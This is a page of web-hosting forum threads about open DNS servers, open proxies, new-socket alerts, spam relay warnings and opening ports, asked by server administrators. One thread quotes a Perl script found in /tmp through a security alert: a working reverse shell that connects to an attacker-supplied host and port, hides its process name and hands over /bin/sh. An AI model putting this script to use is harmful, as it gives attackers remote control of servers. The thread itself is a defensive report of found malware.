Alert: Open DNS Server
Apr 16, 2007
I've run "DNS report" test for one hosting in dnsstuff.com and got this warning (as some times before for other hosts:
---------------------
Fail:
Open DNS server
ERROR: One or more of your nameservers reports that it is an open DNS server. This usually means that anyone in the world can query it for domains it is not authoritative for (it is possible that the DNS server advertises that it does recursive lookups when it does not, but that shouldn't happen). This can cause an excessive load on your DNS server. Also, it is strongly discouraged to have a DNS server be both authoritative for your domain and be recursive (even if it is not open), due to the potential for cache poisoning (with no recursion, there is no cache, and it is impossible to poison it). Also, the bad guys could use your DNS server as part of an attack, by forging their IP address.
-----------------------
Is this anythhing important?
View 3 Replies
ADVERTISEMENT
Feb 13, 2007
I am getting on every 10 minutes mails like that from my server every one has different ports
Quote:
This is an automated alert generated from *********. This alert is to
notify the addressed users of new server sockets. New server sockets can
indicate server-software that has been started on your host, or otherwise
be an indication to malicious activity. It is advised to review this alert
and investigate if needed.
Following is a summary of new Internet Server Sockets:
> tcp 0 0 ************:3262 0.0.0.0:* LISTEN
Quote:
This is an automated alert generated from *************. This alert is to
notify the addressed users of new server sockets. New server sockets can
indicate server-software that has been started on your host, or otherwise
be an indication to malicious activity. It is advised to review this alert
and investigate if needed.
Following is a summary of new Internet Server Sockets:
> tcp 0 0 *************:53007 0.0.0.0:* LISTEN -
Quote:
This is an automated alert generated from *********. This alert is to
notify the addressed users of new server sockets. New server sockets can
indicate server-software that has been started on your host, or otherwise
be an indication to malicious activity. It is advised to review this alert
and investigate if needed.
Following is a summary of new Internet Server Sockets:
> tcp 0 0 ***********:44543 0.0.0.0:* LISTEN
How can i find why this is coming? My managment company said me that a script is tryig to open a socket but we couldnt find the script. Is there any people here have like a similar issue or how can i find and solve this?
View 2 Replies
View Related
Mar 28, 2009
Is there any software to alert me using sms and email when my server is down?
I know a few good online solutions but i want to test also a solution from my pc.
View 4 Replies
View Related
Oct 31, 2009
I have dedicated server..i installed cpanel on it but when am accessing it
[url]
i am not able to open it..so i think port is not open so can any one tell me how to open ports...the os installed is centos..
View 12 Replies
View Related
Nov 18, 2008
A potential client asked us the followingo you allow PHP to open sockets on your server? If yes, is there any restriction on the amount of data that can be downloaded?
Will we be able to access and load our remote webpage using PHP? We will use sockets and a Pear library to accomplish this.
We are basically planning on using some content from our remote site on the new site which will be hosted on your servers. Kindly reply back at the earliest.
Is this a potential spammer?
View 2 Replies
View Related
Mar 20, 2007
I found out that my server has open DNS. Anyone in the world can query it for domains it is not authoritative for. Is it normal?
View 6 Replies
View Related
Feb 8, 2008
Just being doing a load of DNSstuff.com queries to try and get everything to "pass", I noticed that some big players in the hosting scene have either open or closed DNS servers.
Softlayer.com have closed, while liquidweb.com are open...?
I have changed all mine to closed, just because dnsstuff advises it, but is there any reason you would want them open..?
View 3 Replies
View Related
Oct 24, 2009
I have a server that is running linux with WHM/cPanel , some of servers are rejecting mails through server and says that your server is open proxy mail server.
how to check that our server is open proxy or stop open proxy and how can i prevent our server from spammer?
View 4 Replies
View Related
Apr 10, 2007
I'm having problems with users using open proxies accessing, abusing, and defacing my website.
I'd like to get a list of all open proxies and incorporate it into my site (i.e. block open proxy accesses)
I've already looked at SORBS, but that is DNS based, and I'm not sure I want to go that route. (I am running one DNS server for my own webserver to use. Don't want to mess with adding another zone for the dnsbl).
I've be much happier building my own php/mysql lookup of the proxy blacklist.
So I'm looking for somewhere I can simply download a proxy blacklist, and update it periodically as needed.
View 5 Replies
View Related
May 7, 2009
I am using Putty to connect to my server via ssh.
When opening a direct connection, i can login quickly without any problem
Quote:
login as: gracie
gracie@server1's password:
Last login: Thu May 7 07:31:26 2009 from 192.168.0.5
gracie@server1 [~]# sudo su -
Password:
root@server1 [~]#
When I open a connection FROM ANOTHER SERVER, I have to wait more than 20 seconds
Quote:
login as: tech2
tech2@server2's password:
Last login: Thu May 7 07:32:07 2009 from 192.168.0.5
tech2@server2 [~]# ssh gracie@192.168.0.222
Password:
After I enter the password, I waited 20 seconds before I am logged in.
View 2 Replies
View Related
Mar 11, 2008
Our new data center provided us with a Cisco ASA5510 firewall. We're setting up all new servers and will begin migrating all of our domains from our current co-lo to the new place.
At the old co-lo, they provided us a very basic BSD based router, and our servers all had external public facing IPs on them. Firewalling was handled at the server (Windows Firewall or Linux IPtables).
The new place is NAT'ing us, so our servers all have a 192.168.10.x address inside, and they map the external address for us through to the inside.
By default, they are locking everything down. I had to ask them to open ssh so I could remote into my CentOS box last night.
I'm not a network guru-- what ports are going to NEED to be opened so I can give them a list? This is a standard PLESK hosting server so http (80), https, ssh, ftp, pop3, smtp, what else? Anyone have a list?
View 2 Replies
View Related
Mar 8, 2008
subdomains on my dedicated server with co.il endings (israeli) dont work though with com domains they do work i anybody has a clue for fixing this? maybe its DNS directing problems.
View 2 Replies
View Related
Feb 8, 2008
I dont know if this has been asked before. Anyway what I want to accomplish is I want an email be sent to my email address everytime someone connects to my SSH. I want an email sent regardless it was a successful or failed login. Is there a step by step tutorial for this.
View 5 Replies
View Related
Mar 3, 2008
I just received this alert, can anyone tell me what that means?
I did not install anything...
> tcp 0 0 IP:19848 0.0.0.0:* LISTEN -
> tcp 0 0 IP:19900 0.0.0.0:* LISTEN -
> tcp 0 0 IP:22812 0.0.0.0:* LISTEN -
> tcp 0 0 IP:24924 0.0.0.0:* LISTEN -
> tcp 0 0 IP:27411 0.0.0.0:* LISTEN -
> tcp 0 0 IP:27542 0.0.0.0:* LISTEN -
> tcp 0 0 IP:29077 0.0.0.0:* LISTEN -
> tcp 0 0 IP:32895 0.0.0.0:* LISTEN -
> tcp 0 0 IP:36635 0.0.0.0:* LISTEN -
> tcp 0 0 IP:46277 0.0.0.0:* LISTEN -
> tcp 0 0 IP:47068 0.0.0.0:* LISTEN -
> tcp 0 0 IP:51199 0.0.0.0:* LISTEN -
> tcp 0 0 IP:52752 0.0.0.0:* LISTEN -
> tcp 0 0 IP:56869 0.0.0.0:* LISTEN -
View 0 Replies
View Related
Aug 16, 2007
Thought this might be of interest to folks on WHT. We put together a solution using Nginx ( Engine-X ) to do Global Server Load Balancing. This solution lets you do GSLB without having to fork over $26k per site to F5 or Foundry.
Thought it would be of interest to both end-users as well as dedicated hosting providers who might want to make it into a service (eg. sell a dedicated host in Europe and the US as a group, with the solution pre-installed).
The entire project, including relavent configs is available for download in the latest ( issue 6 ) FREE issue of o3 magazine (o3magazine.com)
View 4 Replies
View Related
Feb 20, 2008
I want to set up a dedicated server for spam and virus filtering (MX)
But i was wondering, is there a good opensource based tool for this?
View 14 Replies
View Related
Feb 19, 2008
How can I open port 3000 on my linux server.
I need it for Canada Post live shipping quotes.
View 1 Replies
View Related
Apr 30, 2008
I installed csf: v3.28 on my server .
Where is this email configurable? I have seen this email alert notification in the logs numerous times but have yet to receive any alert emails from CSF/LFD.
View 1 Replies
View Related
Jun 5, 2008
i have this notification that keeps coming from the same ip at least 10 or 20 times a day since 3 days aprox. dunno what it is...
this is the message:
Quote:
subject: lfd on nameserver.domain: RELAY Alert for 200.27.xxx.xxx (domain.cl)
body:
Time: Thu Jun 5 10:56:19 2008
Type: RELAY, Remote IP - 200.27.xxx.xxx (domain.cl)
Count: 101 emails relayed
Blocked: No
Sample of the first 10 emails:
2008-06-05 10:19:56 1K4GJo-00040m-Rf <= 3eseofertas@gmail.com H=(mail.gmail.com) [200.27.xxx.xxx] P=esmtp S=1738 id=20080605102044.5323CE2BEB4A1707@gmail.com T="Especial Empresas STGO - CCTV -Evaluacion en Terreno sin Costo."
it looks like spam... is my server sending spam or im receiving it?
View 2 Replies
View Related
Jul 13, 2007
I have many domains and webservers. so it's hard to monitor everything usually. i heard there are some websites and softwares to do this.
does windows 2003 have anything default like this ? or can anyone suggest the application for my windows 2003 server? which sends alerts if any error is going on my server?
Also there any other websites which is doing this monitoring? because i have some shared accounts and i want to monitor it too.
View 5 Replies
View Related
May 30, 2007
please check the following screnshot
[url]
this is way better, my server goes up for 10-20 minutes then I have to hit restart from the virtouzzo, becuase the server simply goes dead. nothing loads..
how can I know which site on my vps is causing trouble and how to fix it?
View 3 Replies
View Related
Jan 7, 2015
I have used the patch : [URL] .... to disable ssl v3.
After I applied the patch getting error below when i try to send email via horde webmail:
There was an error sending your message: Could not open secure TLS connection to the server.
Roundcube can send mails well but horde not. Otherwise since applied the parch i can't get mails from gmail and maybe other providers i don't know yet.
View 1 Replies
View Related
Apr 16, 2009
has anyone purchased a server from the op and received it yet?
View 14 Replies
View Related
Apr 10, 2008
In less than 5 mins of account activation user named Paul McGrath, supposedly from NY. Allegedly using lolchurch.com domain (that domain was never forwarded to our server) and user just put a script called send.php and let it rip.
Good thing i was around and management looked at it within minutes (AcuNett).
So, watch for this user signing up and check account(if using that user name or similar domain or recent signups) for any such php page.
Now asks us for refund for suspending his site for spamming.. Asked for his driver license copy to first verify his address, so possibly i can report to paypal for possible fraud too or some online internet police maybe for fraud if there is such a police
Note to Mods. not sure where threads like these go to!
Quick edit: Now user trying to threaten us to give their refund cause they want it back for they spammed and deserve a refund for the same.
"Your servers were awful anyways, I maybe sent 500 emails? I'm gonna ask nicely before I actually do something about this, give me a refund."
he forgot 500 emails in less than 5 mins. does not look like not-spam. Anyways i go have some chat with the fraud, id does not match paypal payment id
View 14 Replies
View Related
Mar 25, 2009
why its doing this when i try create a vps?
Quote:
Alert: no_kernel_support_for_openvz_check_if_right_kernel...
Quote:
[root@box ~]# cat /etc/grub.conf
# grub.conf generated by anaconda
#
# Note that you do not have to rerun grub after making changes to this file
# NOTICE: You have a /boot partition. This means that
# all kernel and initrd paths are relative to /boot/, eg.
# root (hd0,0)
# kernel /vmlinuz-version ro root=/dev/sda5
# initrd /initrd-version.img
#boot=/dev/sda
default=0
timeout=5
splashimage=(hd0,0)/grub/splash.xpm.gz
hiddenmenu
title CentOS (2.6.18-92.1.22.el5)
root (hd0,0)
kernel /vmlinuz-2.6.18-92.1.22.el5 ro root=LABEL=/
initrd /initrd-2.6.18-92.1.22.el5.img
[root@box ~]#
Quote:
[root@box ~]# rpm -qa | grep kernel
kernel-2.6.18-92.el5
kernel-devel-2.6.18-92.el5
kernel-2.6.24.5grsechostnoc4.0.0x86_64libata-1
kernel-headers-2.6.18-92.1.22.el5
kernel-devel-2.6.18-92.1.22.el5
kernel-2.6.18-92.1.22.el5
[root@box ~]#
Have tried running:
yum -y install ovzkernel.x86_64
Quote:
Installing: ovzkernel ######################### [1/1]
Error unpacking rpm package ovzkernel - 2.6.18-92.1.18.el5.028stab060.2.x86_64
error: unpacking of archive failed on file /lib/modules/2.6.18-92.1.18.el5.028stab060.2/kernel/arch/x86_64/crypto/aes-x86_64.ko;49c8f08e: cpio: write
Installed: ovzkernel.x86_64 0:2.6.18-92.1.18.el5.028stab060.2
Complete!
View 3 Replies
View Related
Jul 3, 2008
I've gotten two fraudulent signups from the following ip address:
206.53.49.**
Luckily, maxmind has caught him both times, but he's using an address from canada and the phone is fake but the domains he's using are real.
I've gone ahead and blocked the ips, but I just wanted to let you guys know.
View 14 Replies
View Related
Apr 26, 2008
Gmail has a feature to detect email phishing and it marks them with a red header alert saying "Warning" This message may not be from whom......", I believe this red alert has nothing to do with spf record of that email, so how does it detect it as phishing email?
We have spf record and I sent an email from another server, when I received that emai the spf record was "softfail" but it does not have that red alert.
View 0 Replies
View Related
Mar 24, 2008
I got this system email:
Time: Sun Mar 23 23:09:01 2008
File: /tmp/back
Reason: Script, starts with #!
Owner: nobody:nobody
Action: No action taken
So I looked and the file says this:
#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!
");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!
");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!
");
connect(SOCKET, $paddr) || die("Error: $!
");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);
That one line 'echo "`uname -a`";echo "`id`";/bin/sh';
View 13 Replies
View Related
Jun 7, 2007
how i can secure vps from this kind of script and known when someone upload shell script. How do I set the alert so I get to know that someone has uploaded a script on the server
View 3 Replies
View Related
